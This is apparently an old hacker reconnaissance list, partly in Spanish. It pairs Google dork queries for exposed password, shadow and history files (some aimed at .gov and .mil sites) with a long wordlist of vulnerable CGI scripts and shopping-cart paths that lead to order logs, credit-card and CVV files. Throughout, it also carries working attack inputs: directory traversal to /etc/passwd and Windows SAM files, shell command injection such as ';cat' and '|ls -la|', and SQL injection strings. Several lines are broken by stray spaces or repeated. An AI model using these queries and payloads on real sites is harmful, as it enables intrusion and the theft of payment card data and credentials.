507. /cgi/pagelog.cgi
508. /php/mlog.phtml
509. /cgi-bin/shop/apdproducts.mdb
510. /htbin/shop/auth_data/auth_user_file.txt
511. /server%20logfile;;;
512. /database/metacart.mdb
513. /cgi-local/shop/orders/orders.txt

Code:
filetype:htpasswd htpasswd
intitle:"Index of .htpasswd -intitle:"dist -apache -htpasswd.c
index.of.private (algo privado)
intitle:index.of master.passwd
inurl:passlist.txt (para encontrar listas de passwords)
intitle:"Index of..etc passwd
intitle:admin intitle:login
Incorrect syntax near (SQL script error)
intitle:"the page cannot be found inetmgr (debilidad en IIS4)
intitle:index.of ws_ftp.ini
Supplied arguments is not a valid PostgreSQL result (possible debilidad SQL)
_vti_pvt password intitle:index.of (Frontpage)
inurl:backup intitle:index.of inurl:admin
Index of /backup
index.of.password
index.of.winnt

inurl:"auth_user_file.txt
Index of /admin
Index of /password
Index of /mail
Index of / +passwd
Index of / +.htaccess
Index of ftp +.mdb allinurl:/cgi-bin/ +mailto
allintitle: index of/admin
allintitle: index of/root
allintitle: sensitive filetype:doc
allintitle: restricted filetype :mail
allintitle: restricted filetype:doc site:gov
administrator.pwd.index
authors.pwd.index
service.pwd.index
filetype:config web
gobal.asax index
inurl:passwd filetype:txt
inurl:admin filetype:db
inurl:iisadmin
inurl:"auth_user_file.txt
inurl:"wwwroot/*.
allinurl: winnt/system32/ (get cmd.exe)
allinurl:/bash_history
intitle:"Index of .sh_history
intitle:"Index of .bash_history
intitle:"Index of passwd
intitle:"Index of people.1st
intitle:"Index of pwd.db
intitle:"Index of etc/shadow
intitle:"Index of spwd
intitle:"Index of master.passwd
intitle:"Index of htpasswd
intitle:"Index of members OR accounts
intitle:"Index of user_carts OR user _cart



--------------------------------------------------------------------------------

-==[Hackers Favourite Keywords in google.]

"Index of /admin"
"Index of /password"
"Index of /mail"
"Index of /" +passwd
"Index of /" +password.txt
"Index of /" +.htaccess
index of ftp +.mdb allinurl:/cgi-bin/ +mailto

administrators.pwd.index
authors.pwd.index
service.pwd.index
filetype:config web
gobal.asax index

allintitle: "index of/admin"
allintitle: "index of/root"
allintitle: sensitive filetype:doc
allintitle: restricted filetype :mail
allintitle: restricted filetype:doc site:gov

inurlasswd filetype:txt
inurl:admin filetype:db
inurl:iisadmin
inurl:"auth_user_file.txt"
inurl:"wwwroot/*."


top secret site:mil
confidential site:mil

allinurl: winnt/system32/ (get cmd.exe)
allinurl:/bash_history

intitle:"Index of" .sh_history
intitle:"Index of" .bash_history
intitle:"index of" passwd
intitle:"index of" people.lst
intitle:"index of" pwd.db
intitle:"index of" etc/shadow
intitle:"index of" spwd
intitle:"index of" master.passwd
intitle:"index of" htpasswd
intitle:"index of" members OR accounts
intitle:"index of" user_carts OR user_cart

ALTERNATIVE INPUTS====================

_vti_inf.html
service.pwd
users.pwd
authors.pwd
administrators.pwd
shtml.dll
shtml.exe
fpcount.exe
default.asp
showcode.asp
sendmail.cfm
getFile.cfm
imagemap.exe
test.bat
msadcs.dll
htimage.exe
counter.exe
browser.inc
hello.bat
default.asp\
dvwssr.dll
cart32.exe
add.exe
index.jsp
SessionServlet
shtml.dll
index.cfm
page.cfm
shtml.exe
web_store.cgi
shop.cgi
upload.asp
default.asp
pbserver.dll
phf
test-cgi
finger
Count.cgi
jj
php.cgi
php
nph-test-cgi
handler
webdist.cgi
webgais
websendmail
faxsurvey
htmlscript
perl.exe
wwwboard.pl
www-sql
view-source
campas
aglimpse
glimpse
man.sh
AT-admin.cgi
AT-generate.cgi
filemail.pl
maillist.pl
info2www
files.pl
bnbform.cgi
survey.cgi
classifieds.cgi
wrap
cgiwrap
edit.pl
perl
names.nsf
webgais
dumpenv.pl
test.cgi
submit.cgi
guestbook.cgi
guestbook.pl
cachemgr.cgi
responder.cgi
perlshop.cgi
query
w3-msql
plusmail
htsearch
infosrch.cgi
publisher
ultraboard.cgi
db.cgi
formmail.cgi
allmanage.pl
ssi
adpassword.txt
redirect.cgi
cvsweb.cgi
login.jsp
dbconnect.inc
admin
htgrep
wais.pl
amadmin.pl
subscribe.pl
news.cgi
auctionweaver.pl
.htpasswd
acid_main.php
access.log
log.htm
log.html
log.txt
logfile
logfile.htm
logfile.html
logfile.txt
logger.html
stat.htm
stats.htm
stats.html
stats.txt
webaccess.htm
wwwstats.html
source.asp
perl
mailto.cgi
YaBB.pl
mailform.pl
cached_feed.cgi
global.cgi
Search.pl
build.cgi
common.php
show
global.inc
ad.cgi
WSFTP.LOG
index.html~
index.php~
index.html.bak
index.php.bak
print.cgi
register.cgi
webdriver
bbs_forum.cgi
mysql.class
sendmail.inc
CrazyWWWBoard.cgi
search.pl
way-board.cgi
webpage.cgi
pwd.dat
adcycle
post-query
help.cgi

/robots.txt
/admin.mdb
/shopping.mdb
/arg;
/stats/styles.css
/statshelp.htm
/favicon.ico
/stats/admin.mdb
/shopdbtest.asp
/cgi-bin/test.cgi
/cgi-bin/test.pl
/cgi-bin/env.cgi
/photos/protest/styles.css
http://hpcgi1.nifty.com/trino/ProxyJ/prxjdg.cgi
/cgi-bin/whereami.cgi
/shopping400.mdb
/cgi/test.cgi
/cgi-bin/test2.pl
/photos/protest/kingmarch_02.html
/chevy/index.htm
/cgi-bin/glocation.cgi
/cgi-bin/test2.cgi
/ccbill/glocation.cgi
/cgi-bin/styles.css
/shopping350.mdb
/cgi-bin/shopper.cgi
/shopadmin.asp
/news_2003-02-27.htm
/cgi-bin/whois.cgi
3 /cgi-bin/calendar.pl
3 /cgi-bin/calendar/calendar.pl
3 /cgibin/styles.css
3 /venem.htm
2 /stats/www.newbauersflowers.com/stats/04-refers.htm
2 /cgi-bin/where.pl
2 /cgibin/shopper.cgi&TEMPLATE=ORDER.LOG
2 /cgibin/recon.cgi
2 /cgibin/test.cgi
2 /WebShop/templates/styles.css
2 /stats/shopping350.mdb
2 /cgi-bin/mailform.cgi
2 /cgi-bin/recon.cgi
2 /chevy
2 /cgi-bin/servinfo.cgi
2 /acart2_0.mdb
2 /cgi-bin/where.cgi
2 /chevy/
2 /stats/www.savethemall.net/stats/19-refers.htm
2 /ccbill/secure/ccbill.log
2 /cgi/recon.cgi
2 /stats/www.gregoryflynn.com/chevy
2 /ibill/glocation.cgi
2 /ccbill/whereami.cgi
2 /ibill/whereami.cgi
2 /apps_trial.htm
2 /cgi-bin/lancelot/recon.cgi
2 /cgi-bin/DCShop/Orders/styles.css
1 /cgi-bin/htmanage.cgi
1 /stats/www.tysons.net/stats/05-refers.htm
1 /cgi-bin/mastergate/add.cgi
1 /cgi-bin/openjournal.cgi
1 /cgi-bin/calendar/calendar_admin.pl
1 /cgibin/ibill/count.cgi
1 /cgi-bin/nbmember2.cgi
1 /cgi-bin/mastergate/count.cgi
1 /cgi-bin/mastergate/accountcreate.cgi
1 /cgi-bin/ibill/accountcreate.cgi
1 /cgibin/MasterGate2/count.cgi
1 /cgi-bin/amadmin.pl
1 /cgibin/mailform.cgi
1 /cgibin/mastergate/count.cgi
1 /cgibin/harvestor.cgi
1 /cgibin/igate/count.cgi
1 /WebShop
1 /shopdisplaycategories.asp
1 /cgi-bin/DCShop/Orders/orders.txt
1 /cgi-bill/revshare/joinpage.cgi
1 /stats/www.gregoryflynn.com/stats/19-refers.htm
1 /cgi-local/DCShop/auth_data/styles.css
1 /cgi-bin/add-passwd.cgi
1 /cgi-bin/MasterGate/count.cgi
1 /apps_shop.htm%20/comersus/database/comersus.mdb
1 /data/verotellog.txt
1 /epwd/ws_ftp.log
1 /stats/www.dialacure.com/stats/16-refers.htm
1 /cgi/MasterGate2/count.cgi
1 /jump/rsn.tmus/skybox;sz=140x150;segment=all;resor=jackson;state= WY;sect=home;tile=8;ord=57019
1 /wwii/styles.css
1 /cgi-bin/admin.mdb
1 /stats/www.gregoryflynn.com/stats/31-refers.htm
1 /cgi-bin/ibill-tools/count.cgi
1 /WebShop/templates/cc.txt
1 /cgibin/ibill/accountcreate.cgi
1 /cgi-bin/count.cgi
1 /cgi-local/DCShop/auth_data/auth_user_file.txt
1 /cgi/mastergate/count.cgi
1 /cgi-bin/EuroDebit/addusr.pl
1 /cgi-bin/dbm-passwd.cgi
1 /cgi/igate/accountcreate.cgi
1 /cgi-bin/store/Log_files/your_order.log
store/log_files/your_order.log
/cg i-bin/DCShop/Orders/orders.txt
/vpasp/shopdbtest.asp
/orders/checks.txt
/WebShop/logs
/ccbill/secure/ccbill.log
/scripts/cart32.exe
/ cvv2.txt
/cart/shopdbtest.asp
/cgi-win/cart.pl
/shopdbtest.asp
/WebShop/logs/cc.txt
/cgi-local/cart.pl
/PDG_Cart/order.log
/config/---.mdb
/cgi-bin/ezmall2000/mall2000.cgi?page=../mall_log_files/order.log%00html
/or ders/orders.txt
/cgis/cart.pl
/webcart/carts
/cgi-bin/cart32.exe/cart32clientlist
/cgi/cart.pl
/comersus/database/comersus.mdb
/WebShop/temp lates/cc.txt
/Admin_files/order.log
/orders/mountain.cfg
/cgi-sys/cart.pl
/scripts/cart.pl
/htbin/cart.pl
/productcart/database/EIPC.mdb
/shoponline/fpdb/shop.mdb
/config/datasources/myorder.mdb
/PDG_Cart/shopper.conf
/shopping/database/metacart.mdb
/bin/cart.pl
/cgi-bin/cart32.ini
/database/comersus.mdb
/cgi-local/medstore/loadpage.cgi?user_id= id&file=data/orders.txt
/cgi-bin/store/Admin_files/myorderlog.txt
/cgi-bin/orders.txt
/cgi-bin/store/Admin_files/your_order.log
/test/test.txt
/fpdb/shop.mdb
/cgibin/shop/orders/orders.txt
/shopadmin1.asp
/cgi-bin/shop.cgi
/cgi-bin/commercesql/index.cgi?page=../admin/manager.cgi
/cgi-bin/PDG_cart/card.txt
/shopper.cgi?preadd=action&key=PROFA&template=order1.log
/store/shopdbtest.asp
/log_files/yo ur_order.log
/_database/expire.mdb
/HyperStat/stat_what.log
/cgi bin/DCShop/auth_data/auth_user_file.txt
/htbin/orders/orders.txt
/SHOP/shopadmin.asp
/index.cgi?page=../admin/files/order.log
/vpshop/shopadmin.asp
/webcart/config
/PDG/order.txt
/cgi-bin/shopper.cgi
/orders/order.log
/orders/db/zzzbizorders.log.html
/easylog/easylog.html
/cgi-bin/store/Log_files/your_order.log
/cgi-bin /%20shopper.cgi?preadd=action&key=PROFA&template=shopping400.mdb
/comersus_message.asp?
/orders/import.txt
/htbin/DCShop/auth_data/auth_user_file.txt
/admin /html_lib.pl
/cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=myorder.txt
/cgi-bin/DCShop/auth_data/auth_user_file.txt
/cgi-bin /shop.pl/page=;cat%20shop.pl
/cgi-bin/shopper?search=action&keywords=dhenzuser%20&template=order.log
/HBill/htpasswd
/bin/shop/auth_data/auth_user_file.txt
/cgi-bin /cs/shopdbtest.asp
/mysql/shopping.mdb
/Catalog/config/datasources/Products.mdb
/trafficlog
/cgi/orders/orders.txt
/cgi-local/PDG_Cart/shopper.conf
/store/cgi-bin/---.mdb
/derbyteccgi/shopper.cgi?key=SC7021&preadd=action&template=order.log
/derbyteccgi/shopper.cgi?search=action&keywords=moron&template=order.log
/cgi-bin/mc.txt
/cgi-bin/mall2000.cgi
/cgi-win /DCShop/auth_data/auth_user_file.txt
/cgi-bin/shopper.cgi?search=action&keywords=root%20&template=order.log
/store/commerce.cgi
/scripts/ shop/orders/orders.txt
/product/shopping350.mdb
/super_stats/access_logs
/cgi-local/orders/orders.txt
/ cgi-bin/PDG_Cart/mc.txt
/cgibin/cart32.exe
/cgi-bin/Shopper.exe?search=action&keywords=psiber%20&template=other/risinglogorder.log
/cgibin/password.txt
/Catalog/cart/carttrial.dat
/catalog/Admin /Admin.asp
/ecommerce/admin/user/admin.asp
/data/productcart/database/EIPC.mdb
/store/admin_files/commerce_user_lib.pl
/cgi-bin/store/index.cgi
/paynet.txt
/config/datasources/store/billing.mdb
/_database/shopping350.mdb
/cgi-bin/shopper.exe?search
/cgi/shop.pl/page=;cat%20shop.pl
/cgi-bin /store/Admin_files/orders.txt
/cgi-bin/store/commerce_user_lib.pl
/cgi-sys/pagelog.cgi
/cgi-sys/shop.pl/ page=;cat%20shop.pl
/scripts/weblog
/fpdb/shopping400.mdb
/htbin/shop/orders/orders.txt
/cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=myorder.log
/cgi-bin/shopper.exe?search=action&keywords=psiber&template=order.log
/mall_log_files/
/cgi-bin/perlshop.cgi
/tienda/shopdbtest.asp
/cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=shopping.mdb
/cgi-bin/shopper.cgi?search=action&keywords=whinhall&template=order.log
/WebShop/logs/ck.log
/fpdb/shopping300.mdb
/mysql/store.mdb
/cgi-bin/store/Admin_files/commerce_user_lib.pl
/config.dat
/order/order.log
/commerce_user_lib.pl
/Admin_files/AuthorizeNet_user_lib.pl
/cvv2.asp
/cgi-bin/cart32/CART32-order.txt
/wwwlog
/cool-logs/mlog.html
/cgi-bin /pass/merchant.cgi.log
/cgi-local/pagelog.cgi
/cgi-bin/pagelog.cgi
/cgi-bin/orders/cc.txt
/cgis/shop/orders/orders.txt
/admin /admin_conf.pl
/cgi-bin/pdg_cart/order.log
/cgi/PDG_Cart/order.log
/Admin_files/ccelog.txt
/cgi-bin/orders/mc.txt
/cgi/cart32.exe
/ecommerce/admin /admin.asp
/scripts/DCShop/auth_data/auth_user_file.txt
/Catalog/config/---.mdb
/ecommerce/admin/shopdbtest.asp
/mysql/mystore.mdb
/cgi-bin /%20shopper.cgi?preadd=action&key=PROFA&template=shopping.asp
/cgi-bin/commercesql/index.cgi?page=../admin/files/order.log
/cgi-bin/Count.cgi?df=callcard.dat
/logfiles/
/shopping/shopping350.mdb
/admin/configuration.pl
/cgis/DCShop/auth_data/auth_user_file.txt
/cgis/cart32.exe
/ cgi-bin/dcshop.cgi
/cgi-win/shop/auth_data/auth_user_file.txt
/shopping400.mdb
/HBill/config
/cgi-bin/shop/index.cgi?page=../admin/files/order.log
/search=action&keywords=GSD%20&template=order.log
/WebCart/orders.txt
/PDG_Cart/ authorizenets.txt
/cgi-bin/AnyForm2
/~gcw/cgi-bin/Count.cgi?df=callcard.dat
/cgi-bin/PDG_Cart/order.log
/expire.mdb
/logger/
/webcart-lite/orders/im port.txt
/cgi-bin/commercesql/index.cgi?page=../admin/admin_conf.pl
/cgi-bin/PDG_Cart/shopper.conf
/cgi-bin/cart32.exe
/dc/orders/orders.txt
/cgi-local/DCShop/orders/orders. txt
/shop.pl/page=shop.cfg
/cgi-local/cart32.exe
/cgi-win/pagelog.cgi
/cgi-win /shop/orders/orders.txt
/cgibin/shopper.cgi?search=action&keywords=moron&template=order.csv
/cgi-sys/DCShop/auth_data/auth_user_file.txt
/ cgi-bin/www-sql;;;
/cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=order.log
/scripts/orders/orders.txt
/cgi-loca l/shop.pl/shop.cfg
/search=action&keywords=cwtb%20&template=expire.mdb
/php/mylog.phtml
/config/datasources/shopping.mdb
/php-coolfile/action.php?action=edit&file=config.php
/cgi-bin/ezmall2000/mall2000.cgi
/cgi/DCShop/orders/orders.txt
/cgi-local/ shop.pl
/cgis/DCShop/orders/orders.txt
/product/shopdbtest.asp
/ ASP/cart/database/metacart.mdb
/cgi-bin/cgi-lib.pl
/cgi-bin/mailview.cgi?cmd=view&fldrname=inbox&select=1&html
/search=action&keywords=cwtb%20&template=order.log
/mysql/expire.mdb
/scripts/sh op/auth_data/auth_user_file.txt
/cgi-bin/cart32/whatever-OUTPUT.txt
/Shopping%20Cart/shopdbtest.asp
/cgi/shop/auth_data/auth_user_file.txt
/sh op/shopping350.mdb
/cgi-bin/store/Authorize_Net.pl
/scripts/DCShop/orders/orders.txt
/store/l og_files/commerce_user_lib.pl
/shopping/shopadmin.asp
/cgi-bin/orderlog.txt
/cgi-bin/webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;cat%20../../webcart/system/orders/orders.txt|&CO DE=PHOLD;;;
/cool-logs/mylog.html
/cgibin/shop.pl/page=;cat%20shop.pl
/htbin /shop.pl/page=;cat%20shop.pl
/cgi-win/orders/orders.txt
/cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=order1.txt
/SHOP/shopdbtest.asp
/cgi/pagelog.c gi
/php/mlog.phtml
/cgi-bin/shop/apdproducts.mdb
/htbin/shop/auth_data/auth_user_file.txt
/server%20logfile;;;
/database/ metacart.mdb
/cgi-local/shop/orders/orders.txt
/dcshop/auth_data/auth_user_file.txt
/log/
/cgi-bin/shop.cgi/page=../../../../etc/hosts
/scripts/c32web.exe
/cgis/ord ers/orders.txt
/logfile/
/shop_db/shopping.mdb
/shopping.mdb
/weblog/
/config/datasources/cvv2.mdb
/cgi-bin/loadpage.cgi?user_id=id&file=data/db.txtcgi-bin /PDG_Cart/order.log
/cgi-sys/shop/orders/orders.txt
/cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=order1.log
/cgi-win/cart32.exe
/cgi-bin/loadpage.cgi
/dcshop/orders/orders.txt
/shop/show.php?q='
/cgib in/orders/orders.txt
/bin/pagelog.cgi
/cgi-bin/shop/orders/orders.txt
/_database/shopdbtest.asp
/cgibin /pagelog.cgi
/cgi-local/shop.pl/page=;cat%20shop.pl
/shop/search .php?q='
/cgi-sys/cart32.exe
/order13.txt
/weblogs/
/orderb/sh op.mdb
/config/datasources/order.mdb
/store/cgi-bin/Admin_files/Store_user_lib.pl
/cgi-bin/shopper/cheddar/loadpage.cgi?user_id=id&file=data/db.txt;CC
/Orders /order.log
/logs/access_log
/config/datasources/your_order.mdb
/ecommerce/admin/admin/admin.asp
/mall_log_files/order.log
/bin/cart32.exe
/htbin/DCShop/orders/orders.txt
/Admin_files/Authorize_Net.pl
/logging/
/database/
/cgi-sys/shop/auth_data/auth_user_file.txt
/bin/shop.pl/page=;cat%20shop.pl
/cgi-local/shop/auth_data/auth_user_fil e.txt
/cgi-local/DCShop/auth_data/auth_user_file.txt
/cgi-bin/shop/auth_data/auth_user_file.txt
/cgi-win /DCShop/orders/orders.txt
/store/Admin_files/Authorize_Net.pl
/cart/cart.asp
/bin/DCShop/orders/orders.txt
/scripts/pagelog.cgi
/cgi-bin /%20shopper.cgi?preadd=action&key=PROFA&template=expire.mdb
/webcart/config/clients.txt
/dc/auth_data/auth_user_file.txt
/cgi-bin/shopper.exe?preadd=action&key=9461&template=order.log
/cgi-bin/shopper/cheddar/loadpage.cgi?user_id=id&file=data/db.txt
/bin /orders/orders.txt
/cgi-bin/Web_Store/web_store.cgi
/cgis/pagelog.cgi
/cgi-bin /orders/orders.txt
/merchant/shopdbtest.asp
/cgi-local/shop.pl/page=shop.cfg
/cgis/shop.pl/pa ge=;cat%20shop.pl
/index.cgi?%20pagine%20=%20../../../../../../../../etc/passwd
/cg-bin/
/cgi-bin/shopper.cgi&TEMPLATE=ORDER.LOG
/cgi-bin /DCShop/Auth_data/auth_user_file.txt
/ecommerce/admin/adminLeft/admin.asp
/webcart/orders/import.txt
/cgibin/shop/auth_data/auth_user_file.txt
/productcart/database/eipc.mdb
/mysql/cheersoundchdb.mdb
/cgi-bin/order.txt
/scripts/iisadmin/tools/mkilog.exe
/ProductCart/database/EIPC.mdb
/databases/
/cg i-sys/orders/orders.txt
/cgi/DCShop/auth_data/auth_user_file.txt
/ database/EIPC.mdb
//cgi-bin/orders.txt
/vpasp-shopcart/shopdbtest.asp
/cgi-bin /shopper.exe?preadd=action&key=bajk390ss&template=order.log
/cgi-bin/DCShop/orders/orders.txt
/mysql/shopping350.mdb
/_database/shopping.mdb
/htbin/cart32.exe
/PDG_Cart/shopper.config
/cgis/shop/auth_data/auth_user_file.txt
/shop/SHOPDBTEST.ASP
/bin/shop/orders/orders.txt
//cgi-local/medstore/loadpage.cgi?user_id=id &file=data/orders.txt
/cgi-bin/store/dcshop_admin.cgi
/_database/shopping400.mdb
/scripts/shop.pl/page=;cat%20shop.pl
/cgibin/PDG_Cart/shopper.conf
/cgibin/DCShop/orders/orders.txt
/cgibin/%20awstats.pl?output=keywords
/cgi/shop/orders/orders.txt
/cgi-bin /cart32_old.exe
/webshop/templates/cc.txt
/webcart/orders
/pro ductcart/database/shop.mdb
/index.php?link=order
/cgi-bin/store/index.cgi?page=../../../../../../../../etc/passwd
/shopping/shopdisplayproducts.asp?
/ccbill-local.cgi
/bin/DCShop/auth_data/auth_user_file.txt
/cgi-bin /c32web.exe/CheckError?error=53
/server/admin_files/commerce_user_lib.pl
/shopping/shopdisplayproducts.asp?id=1&cat=order.log
/mail.cgi
/cgibin/admin_files/
/cgi-bin/mail/form.cgi
/cgibin/shopping/database/metacart.mdb
/globill/ver12otellog.txt
/cgi-bin/shopping.mdb
/shopping%20.mdb
/cgi-bin/mail.cgi
/cgi-bin/FORM.cgi
/cgibin/shop/database/metacart.mdb
/mail/form.cgi
/cgibin /shop/shopping350.mdb
/form.cgi
/shopping/cgi-bin/cart32.ini
/index.cgi?page=../../../../../../../../etc/passwd
/cgi-bin/c32web.exe/ShowProgress
/vpasp/shopdisplayproducts.asp?cat=qwerty'% 20union%20select%20fldauto
/cgibin/orders.txt
/cgibin/scripts/shop/shopping350.mdb
/form/mail.cgi
/cgi-bin/store1b/index.cgi?page=../../../../../../../../etc/passwd
/webshop/logs/cc.txt
/form/form.cgi
/store/index.cgi?page=../../../../../../../../etc/passwd
/cgibin/awstats.pl%3Flang%3Dit%26output%3Durldetail
/cgibin/%20awstats.pl?
/cgi-bin/Form.cgi
/vpasp/shopdisplayproducts.asp?cat=admin'%20and%20fldpassword%0li%20ke%20'a%25
/admin.mdb
/cgi-bin/cart32.exe/error
/cgi/mail.cgi
/cgi-bin/c32web.exe/ShowAdminDir
/cgi-bin/csql/index.cgi?page=../admin/files/order.log
/cgi-bin/admin_files/
/cgi-bin/csql/index.cgi?page=../../../../../../../../etc/passwd
/admins.asp
/cgi-bin/cart_top
/cgi-bin/mail/mail.cgi
/shopadmin.asp
/cgi-bin/order.log
/mailform.pl
/cgibin/admin.pl
/vpasp/shopdisplayproducts.asp?
/policies1.htm
/cgi-bin/c32web_old.exe
/cgi-bin /c32web.exe
/cgi-bin/form/form.cgi
/cgibin/metacart.mdb
/shopdisplayproducts.asp
/cgi-sys/DCShop/orders/orde rs.txt
/ccbill6/secure/
/MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=3124 &STRMVER=4&CAPREQ=0
/cgi-bin/ibill.log
/ccbill6/
/password.txt
/cgi-bin /PDG_cart/card
/cgibin/www.google.com
/honeymoonhideaway.htm+honeymoon+charleston
/cgibin/awstats.pl%3Flang%3Dnl
/cgibin/admin.pl?setpasswd
/cgibin/awstats.pl%3Fyear%3D2003%26month%3D07
/cgibin/awstats.pl%3Fyear%3D2003%26month%3D08
/cgibin/awstats.pl%3Fyear%3D2003%26month%3D09
/cgibin/%20awstats.pl?output=keywords
/shop/shopping450.mdb
/ccbill6/secure/ccbill.log
/cgibin/awstats.pl%3Flang%3Des%26update%3D1
/cgibin/shopper.cgi?search=action&keywords=ccpower%20&template=shopper.conf
/cgi-bin/form.cgi
/M83A
/cgibin/awstats.pl%3Fyear%3D2003%26month%3D11
/cgibin/amadmin.pl?setpasswd
/cgi-bin/awstats.pl%3Flang%3Dit
/orderdb/database/eipc.mdb
/cg-bin//eshop/database/order.mdb
/store/database/comersus.mdb
/cgibin /password.mdb
/~admin/guestbook
/cgibin/%20awstats.pl?%20cgibin/%20awstats.pl?output=keywords
/cgibin /awstats.pl%3Foutput%3Durldetail%26lang%3Dnl
/cgibin/%20awstats.pl?output=keywords
/sumthin
/cgibin/cgibin/%20awstats.pl?output=keywords
/cgi-bin/shopper.cgi?search=action&keywords=ccpower&template=shopper.conf
/cgibin/productcart/database/eipc.mdb
/cgibin/awstats.pl%3Flang%3Den%26output%3Durldetail
/cgibin/awstats.pl%3Foutput%3Dkeyphrases%26lang%3Dit
/cgibin/awstats.pl%3Foutput%3Durldetail%26lang%3Dde
/mail/mail.cgi
/cgibin/shopper.cgi?search=action&keywords=ccpower&template=shopper.conf
/cgibin/awstats.pl%3Foutput%3Dkeywords%26lang%3Dnl
/cg/.%20/comersus/database/comersus.mdb
/index%20of%20/%20productcart/database/eipc.mdb
/scripts/nsiislog.dll
/cgibin/order.cgi
/_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=2614&STRMVER=4&CAPREQ=0
/cgi-bin /awstats.pl%3Flang%3Dde
/_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=3124&STRMVER=4&CAPREQ=0
/cgibinserver/admin_files/commerce_user_lib.pl
/cgibin/store/Admin_files/myorderlog.txt
//cgibin/orders.txt
/cgibin/database/shopping.mdb
/cgibin/shopping/shopadmin.asp
/cgi-bin/shopper.cgi?preadd=action&key=PROFA&template=order1.log
/cgibin/shopper.exe?search=action&keywords=psiber&template=order.log
/cgibin/allmanageup.pl
/cgi-win/shop.pl/page=;cat%20shop.pl
/eshop/database/log.mdb
/cgibin /awsta
/cgibin/nph-........pl
/cgibin/awstats.pl%3Flang%3Dnl%26update%3D1
//config/---.mdb
/cgibin/awstats.pl%3Foutput%3Dkeywords%26lang%3Den
/cgibin/awstats.pl%3Foutput%3Dkeywords%26lang%3Des
/cgibin/ccbill/password/.htpasswd
/cgi-bin/awstats.pl%3Fyear%3D2003%26month%3D08
/cgibin/awstats.pl%3Flang%3Dde%26output%3Dkeyphrases
/eshop/en/database/credit.mdb
/cgi-bin /pdg_cart/shopper.conf
/password.mdb
/data/verotellog.txt
/cgibin/awstats.pl%3Foutput%3Durldetail%26update%3D1
/productcart/eipc.mdb
/cgi-bin/awstats.pl%3Fyear%3D2003%26month%3D11
/cgibin/awstats.pl%3Foutput%3Durldetail%26lang%3Dit
/index%20of%20/webshop/templates/cc.txt
/cartdb/database/eipc.mdb
/cg i-bin/eshop/database/order.mdb
/cgibin//fpdb/shopping400.mdb
/cgibin/order.txt
/cgi-bin/cart32.exe/expdate%20algunas%20veces
/cgibin/awstats.pl%3Flang%3Dde%26output%3Dkeywords
/cgibin/database/comersus.mdb
/cgi-bin/awstats.pl%3Flang%3Des
/cgibin/awstats.pl%3Foutput%3Dkeywords%26lang%3Dfr
/globill/
/cgibin/fpdb/shopping400.mdb
/cgibin/perl.exe
/eshop/en/database/log.mdb
/cgibin/shopper.exe?search=action&keywords=psiber&template=orders.log
/cg/comersus/database/comersus. mdb
/cgi-bin/awstats.pl%3Fyear%3D2003%26month%3D07
/cgibin/awstats.pl%3Flang%3Dnl%26output%3Durldetail
/cgibin/admin.mdb
/cgi-bin/whereami.cgi?g=ls
/cgibin/xxxhu
cgibin/cartserver/admin_files/commerce_user_lib.pl
/cgibin/%20awstats.pl?output=keywords
/cgibin /awstats.pl%3Foutput%3Dkeyphrases%26lang%3Dfr
/robot.txt
/cgi-bin/form/mail.cgi
/ibill/mypins/
/cgi-bin/awstats.pl%3Flang%3Dnl
/cgibin/allmanage_admin.pl
/cgibin/%20awstats.pl?cgibin/%20awstats.pl?output=keywords
/cg-ibin /admin_files/
/cgibin/cart/comersus.mdb
/cg-bin/eshop/database/order.mdb
/cgibin /htt
/cgibin/phf
/cgibin/awstats.pl%3Foutput%3Durldetail%26lang%3Den
/database/eipc.mdb
/MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=2614&STR MVER=4&CAPREQ=0
/script/shop/shopping350.mdb
/cgibin/shopping350.mdb
/cg-bin/eshop/en/database/credit.mdb
/cgibin/awstats.pl%3Foutput%3Dkeyphrases%26lang%3Den
/cgi-bin/add-passwd.cgi
/logs/200306/charleston.com/
/random_banner/index.cgi?image_list=alternative_image.list&html_file=|ls%20-la|
/cgibin/store/log_files/your_order.log
/cgibin /shopper.exe?search=action&keywords=psiber&template=neworder.log
/cgi-bin/awstats.pl%3Fyear%3D2003%26month%3D09
/cgibin/awstats.pl%3Flang%3Dfr%26update%3D1
/cgibin/awstats.pl%3Foutput%3Dkeywords%26update%3D1
/cgibin /awstats.pl%3Foutput%3Dkeyphrases%26lang%3Dnl
/cgibin/awstats.pl%3Flang%3Dde%26output%3Durldetail
/cgibin/mailform.pl
/cgibin/awstats.pl%3Flang%3Des%26output%3Dkeywords
/cgi-bin/shop/shopping350.mdb
/cgibin/cart/database/comersus.mdb
/dbase/date.
/www.gambling-01.co.uk/cgibin/password.txt
/cgibin/awstats.pl%3Flang%3Des
/ccbill/ccbill.log
/cgibin/awstats.pl%3Flang%3Dnl%26output%3Dkeywords
/cgibin/awstats.pl%3Foutput%3Dkeyphrases%26lang%3Dde
/productcart/pc/Custvb.asp?redirectUrl=&Email=%27+having+1%3D1--&_email=email&password=asd&_password=required&Submit.x=33&Sub mit.y=5&Submit=Submit
/cgibin/index%20of
/cgi-bin/form1.cgi
/cc.txt
/cgibin/awstats.pl%3Flang%3Den%26update%3D1
/cg/./comersus/database/comersus.mdb
/cgi-bin/awstats.pl%3Foutput%3Dkeyphrases
/cgibin /webshop/templates/cc.txt
/....../ all
/....../config.sys
/....../etc/hosts
/../../../../ all
/../../../../../../../boot.ini
/../../../../../winnt/repair/sam._
/../../../../config.sys
/../../../../etc/hosts
/.access
/.bash_history
/.htacc ess
/.html/............./config.sys
/.htpasswd
/.passwd
/ASPSamp/AdvWorks/equipment/catalog_type.asp
/Admin_files/order.log
/AdvWorks/equipment/catalog_type.asp
/Orders/order.log
/PDG_Cart/order.log
/PDG_Ca rt/shopper.conf
/PSUser/PSCOErrPage.htm
/WebShop/logs/cc.txt
/WebShop/logs/ck. log
/WebShop/templates/cc.txt
/_private
/_vti_bin/_vti_aut/dvwssr.dll
/_vti_bin /fpcount.exe
/_vti_inf.html
/_vti_pvt
/_vti_pvt/administrators.pwd
/_vti_pvt/authors.pwd
/_vti_pvt/service.pwd
/_vti_ pvt/shtml.dll
